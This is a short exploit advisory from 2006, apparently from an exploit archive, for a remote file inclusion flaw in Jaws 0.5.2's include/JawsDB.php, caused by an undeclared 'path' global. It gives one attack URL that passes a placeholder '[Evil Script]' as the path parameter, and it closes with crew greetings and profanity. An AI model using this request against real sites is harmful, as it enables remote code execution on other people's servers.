id: 1051
date: 10/22/2006
title: Jaws <= 0.5.2 (include/JawsDB.php) Remote File Include Vulnerability
author: Drago84
cves: 

====================================================================
Jaws <= 0.5.2 (include/JawsDB.php) Remote File Include Vulnerability
====================================================================



###### ToXiC #########################
#
# Jaws 0.5.2: Remote File Inclusion by ToXiC CreW
#
#         ToXic Security Italian CreW
#            BuG FounD by Drago84
#
# Application Affect:
#                    jaws 0.5.2
#
#
#
# Page:                
#     JawsDB.php
#
# Problem:
#
#         GLOBALS["path"] not Declare
#
# Dir :
#      /html/include/
#
#
#
#
#
#
# ExPloit :
#   http://www.site.com/jaws_PATH/html/include/JawsDB.php?path=[Evil Script]
#
#
#       
# GrEatZ All Member of ToXiC
#
#
# FUCK #Sonic
#
###### ToXiC #########



#  0day.today [2023-03-24]  #